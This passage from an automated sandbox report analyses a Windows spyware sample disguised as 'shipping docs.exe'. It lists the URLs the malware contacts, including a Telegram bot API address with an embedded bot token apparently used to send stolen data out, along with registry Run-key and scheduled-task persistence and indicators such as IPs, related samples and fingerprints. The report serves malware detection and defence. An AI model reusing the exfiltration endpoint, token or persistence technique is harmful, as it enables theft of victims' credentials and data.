                        http://www.founder.com.cn/cn/bTheshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.orgshipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers?shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.s.$shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://www.tiro.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240459510.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245545950.000000000547D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.goodfont.co.krshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comshipping docs.exe, 00000000.00000003.242487064.0000000005480000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/1644584536%discordapi%yyyVMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sajatypeworks.comteP$shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://www.sajatypeworks.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240049534.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240150934.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239973997.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239942097.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240076834.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://JIQ1JKgQReGyOBe.comVMqTMMD.exe, 00000015.00000002.533512375.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534481256.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sandoll.co.krighshipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/staff/dennis.htmshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comgritashipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org4shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://Unbjpy.comVMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sandoll.co.krTshipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiVMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comtteJshipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/Oshipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240126460.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240159233.000000000548B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/$shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameshipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.364468167.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.373989607.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Yshipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwshipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://en.wshipping docs.exe, 00000000.00000003.239628147.0000000000BDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/=shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/koshipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comlshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/shipping docs.exe, 00000000.00000003.242044098.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers-shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/frere-jones.htmlshipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.commshipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://api.telegram.orgshipping docs.exe, 00000003.00000002.534617829.000000000334B000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537871887.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cnu-hshipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fonts.com8shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cn%shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cnlJshipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242158018.000000000547B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                    Analysis ID:756232
                                                    Start date and time:2022-11-29 21:18:08 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 9m 43s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:shipping docs.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:24
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@19/9@3/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 83
                                                    • Number of non-executed functions: 11
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 209.197.3.8
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    21:19:06API Interceptor602x Sleep call for process: shipping docs.exe modified
                                                    21:19:09Task SchedulerRun new task: yVGAJfiVEvtg path: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                    21:19:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                    21:19:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                    21:19:28API Interceptor113x Sleep call for process: yVGAJfiVEvtg.exe modified
                                                    21:19:41API Interceptor193x Sleep call for process: VMqTMMD.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    149.154.167.220BL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                      scan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                                                        Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                            AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                                                IMG_2022028022-0120.vbsGet hashmaliciousBrowse
                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                    PO.exeGet hashmaliciousBrowse
                                                                      500 126.htmlGet hashmaliciousBrowse
                                                                        500 126.htmlGet hashmaliciousBrowse
                                                                          Carta de pago.exeGet hashmaliciousBrowse
                                                                            INVOICE SHIPPING-PACKING LIST.exeGet hashmaliciousBrowse
                                                                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                                                                                Rfq#Specification.exeGet hashmaliciousBrowse
                                                                                  SHIPPING INVOICE-PACKING LIST DOCS.exeGet hashmaliciousBrowse
                                                                                    IMG_202202811-0443.vbsGet hashmaliciousBrowse
                                                                                      hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                        DHLDOCUMENTS27011222.exeGet hashmaliciousBrowse
                                                                                          Halkbank.exeGet hashmaliciousBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            api.telegram.orgBL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.23740.23288.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            scan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            IMG_2022028022-0120.vbsGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            500 126.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            500 126.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Carta de pago.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            INVOICE SHIPPING-PACKING LIST.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Rfq#Specification.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SHIPPING INVOICE-PACKING LIST DOCS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            IMG_202202811-0443.vbsGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            DHLDOCUMENTS27011222.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            c-0001.c-msedge.netOAeO1VtpMo.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.12191.6105.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            Iwutiwno.dll.dllGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            kW1RcHd3Np.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            Urgent quote request -pdf-.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            LhLntDLA0i.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            stGLUBW7kG.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            file.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            I8Kmld8K8U.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            CamScanner-397841.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            UPDATED SOA (2).exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            2022#U5e74#U4e2a#U4eba#U52b3#U52a8#U8865#U8d34.docx.docGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            REMITTANCE COPY.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            TNT Invoice_pdf.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            n2cFuTcuzL.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            file.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50
                                                                                            SecuriteInfo.com.Trojan.PackedNET.1617.17943.11881.exeGet hashmaliciousBrowse
                                                                                            • 13.107.4.50

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            TELEGRAMRUXJXuWlR8TZ.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            BL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            file.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            c7oqCiKzbF.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            scan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            synapse3.zipGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            00000000.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99
                                                                                            IMG_2022028022-0120.vbsGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            PO.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            500 126.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            500 126.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Carta de pago.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SyyMuhzBJ3.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.99

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eBL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            cryptor.bin.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SkyNet.1448.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SkyNet.1448.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            solicitud de presupuesto 29-11-2022.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            library.dllGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            MEPS-42.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            11-29-22.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            ORDER.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Quotation.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VMqTMMD.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.355304211458859
                                                                                            Encrypted:false
